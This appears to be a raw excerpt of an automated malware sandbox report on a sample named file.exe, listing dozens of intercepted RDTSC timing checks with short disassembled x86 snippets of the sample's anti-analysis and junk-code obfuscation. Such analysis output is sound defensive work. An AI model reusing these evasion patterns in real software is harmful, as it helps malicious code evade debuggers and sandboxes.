Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7CB10 second address: D7CB14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7CB14 second address: D7CB18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7CB18 second address: D7CB3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FF830E5CFD2h 0x0000000e jl 00007FF830E5CFC6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D807F8 second address: D807FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D83D64 second address: D83D68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D83D68 second address: D83D6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D89130 second address: D89135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D46F16 second address: D46F67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF830ED6D36h 0x0000000a popad 0x0000000b pop eax 0x0000000c add dword ptr [esp], 0EE7EDEDh 0x00000013 pushad 0x00000014 sub dword ptr [ebp+122D2905h], edx 0x0000001a popad 0x0000001b call 00007FF830ED6D39h 0x00000020 jmp 00007FF830ED6D3Dh 0x00000025 push eax 0x00000026 jmp 00007FF830ED6D47h 0x0000002b mov eax, dword ptr [esp+04h] 0x0000002f pushad 0x00000030 push ebx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D46FF0 second address: D47013 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FF830E5CFD7h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4706E second address: D47072 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D47352 second address: D47359 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D47A26 second address: D47A54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov eax, dword ptr [eax] 0x00000007 jmp 00007FF830ED6D49h 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jnp 00007FF830ED6D3Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D47A54 second address: D47A58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D47AB6 second address: D47B33 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF830ED6D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FF830ED6D3Eh 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007FF830ED6D38h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 00000019h 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d jmp 00007FF830ED6D41h 0x00000032 mov edi, esi 0x00000034 lea eax, dword ptr [ebp+12486631h] 0x0000003a mov edi, dword ptr [ebp+122D2A63h] 0x00000040 push eax 0x00000041 pushad 0x00000042 jmp 00007FF830ED6D3Bh 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007FF830ED6D42h 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D47B33 second address: D2BF17 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF830E5CFC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e add edi, dword ptr [ebp+122D2CAFh] 0x00000014 call dword ptr [ebp+122D25EEh] 0x0000001a pushad 0x0000001b push edi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D885BD second address: D885D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF830ED6D47h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D885D8 second address: D885E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D888C2 second address: D888C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D888C8 second address: D888CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D888CC second address: D888D6 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF830ED6D36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D888D6 second address: D888DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8EAA2 second address: D8EAB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF830ED6D36h 0x0000000a jno 00007FF830ED6D36h 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8EAB8 second address: D8EACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FF830E5CFC6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8EACA second address: D8EADE instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF830ED6D36h 0x00000008 jo 00007FF830ED6D36h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8EADE second address: D8EAE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8D723 second address: D8D748 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jg 00007FF830ED6D36h 0x0000000c popad 0x0000000d jo 00007FF830ED6D50h 0x00000013 jmp 00007FF830ED6D3Eh 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8DE5D second address: D8DE65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8E18B second address: D8E18F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8E18F second address: D8E1C1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF830E5CFC6h 0x00000008 jmp 00007FF830E5CFD7h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FF830E5CFD1h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8E7AC second address: D8E7B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D90202 second address: D90206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9473C second address: D94742 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D948D2 second address: D94900 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF830E5CFD0h 0x00000009 pop edi 0x0000000a jmp 00007FF830E5CFD9h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D94A43 second address: D94A5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 jne 00007FF830ED6D36h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jno 00007FF830ED6D36h 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D94CEA second address: D94D07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FF830E5CFCCh 0x0000000a popad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007FF830E5CFC6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D94D07 second address: D94D0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D94D0B second address: D94D1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007FF830E5CFC6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D94D1D second address: D94D21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D94E49 second address: D94E61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FF830E5CFD3h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D95131 second address: D95139 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D95139 second address: D95158 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF830E5CFC6h 0x00000008 js 00007FF830E5CFC6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FF830E5CFCDh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D95158 second address: D9515C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9515C second address: D9516C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007FF830E5CFC6h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D956FD second address: D9570F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF830ED6D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jns 00007FF830ED6D36h 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D99142 second address: D99157 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF830E5CFCAh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D99157 second address: D99176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF830ED6D42h 0x0000000c js 00007FF830ED6D36h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D99176 second address: D99188 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF830E5CFCCh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D98AA1 second address: D98AAB instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF830ED6D36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D98D4D second address: D98D51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D98D51 second address: D98D57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA2925 second address: DA292A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA292A second address: DA2932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA2932 second address: DA2944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007FF830E5CFC6h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA2944 second address: DA2948 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA2948 second address: DA294E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA1D92 second address: DA1D9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA1EFC second address: DA1F3E instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF830E5CFD2h 0x00000008 jbe 00007FF830E5CFC6h 0x0000000e jo 00007FF830E5CFC6h 0x00000014 push edi 0x00000015 push esi 0x00000016 pop esi 0x00000017 pop edi 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push ecx 0x0000001d jmp 00007FF830E5CFD6h 0x00000022 pop ecx 0x00000023 push eax 0x00000024 jp 00007FF830E5CFC6h 0x0000002a ja 00007FF830E5CFC6h 0x00000030 pop eax 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA1F3E second address: DA1F5F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jns 00007FF830ED6D36h 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF830ED6D43h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA1F5F second address: DA1F63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA8634 second address: DA863A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA700F second address: DA7017 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA712B second address: DA7134 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA7134 second address: DA7140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA7450 second address: DA745F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 popad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA745F second address: DA7469 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA7469 second address: DA747F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF830ED6D42h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA747F second address: DA7489 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA7489 second address: DA749C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF830ED6D3Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA749C second address: DA74B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF830E5CFD3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4752B second address: D47596 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FF830ED6D36h 0x00000009 je 00007FF830ED6D36h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 jmp 00007FF830ED6D40h 0x0000001a pop esi 0x0000001b pop edx 0x0000001c nop 0x0000001d push 00000000h 0x0000001f push ebp 0x00000020 call 00007FF830ED6D38h 0x00000025 pop ebp 0x00000026 mov dword ptr [esp+04h], ebp 0x0000002a add dword ptr [esp+04h], 00000014h 0x00000032 inc ebp 0x00000033 push ebp 0x00000034 ret 0x00000035 pop ebp 0x00000036 ret 0x00000037 mov cl, dh 0x00000039 mov ebx, dword ptr [ebp+12486670h] 0x0000003f mov edx, dword ptr [ebp+122D2A9Fh] 0x00000045 mov dh, al 0x00000047 add eax, ebx 0x00000049 and edi, 69ADA756h 0x0000004f nop 0x00000050 pushad 0x00000051 pushad 0x00000052 jmp 00007FF830ED6D3Ah 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D47596 second address: D4760C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d jmp 00007FF830E5CFD2h 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007FF830E5CFC8h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 00000019h 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d mov dword ptr [ebp+122D25B8h], eax 0x00000033 push 00000004h 0x00000035 push 00000000h 0x00000037 push esi 0x00000038 call 00007FF830E5CFC8h 0x0000003d pop esi 0x0000003e mov dword ptr [esp+04h], esi 0x00000042 add dword ptr [esp+04h], 0000001Ch 0x0000004a inc esi 0x0000004b push esi 0x0000004c ret 0x0000004d pop esi 0x0000004e ret 0x0000004f nop 0x00000050 pushad 0x00000051 push ecx 0x00000052 pushad 0x00000053 popad 0x00000054 pop ecx 0x00000055 pushad 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA7782 second address: DA77A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF830ED6D47h 0x00000007 jno 00007FF830ED6D36h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA833C second address: DA8342 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA8342 second address: DA8350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FF830ED6D3Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA8350 second address: DA8354 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB1E0D second address: DB1E11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB1E11 second address: DB1E15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB1E15 second address: DB1E3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF830ED6D49h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB1E3A second address: DB1E3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB1FBA second address: DB1FCC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB22BB second address: DB22D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF830E5CFCEh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB22D3 second address: DB22F7 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF830ED6D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FF830ED6D46h 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB2861 second address: DB2882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edi 0x00000006 pushad 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a jnp 00007FF830E5CFC6h 0x00000010 pop ebx 0x00000011 jng 00007FF830E5CFC8h 0x00000017 push edx 0x00000018 pop edx 0x00000019 jp 00007FF830E5CFD2h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB2882 second address: DB2888 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB3709 second address: DB3731 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF830E5CFD3h 0x00000007 jmp 00007FF830E5CFCDh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB3731 second address: DB3737 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB3737 second address: DB373D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB373D second address: DB3741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB3741 second address: DB3745 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
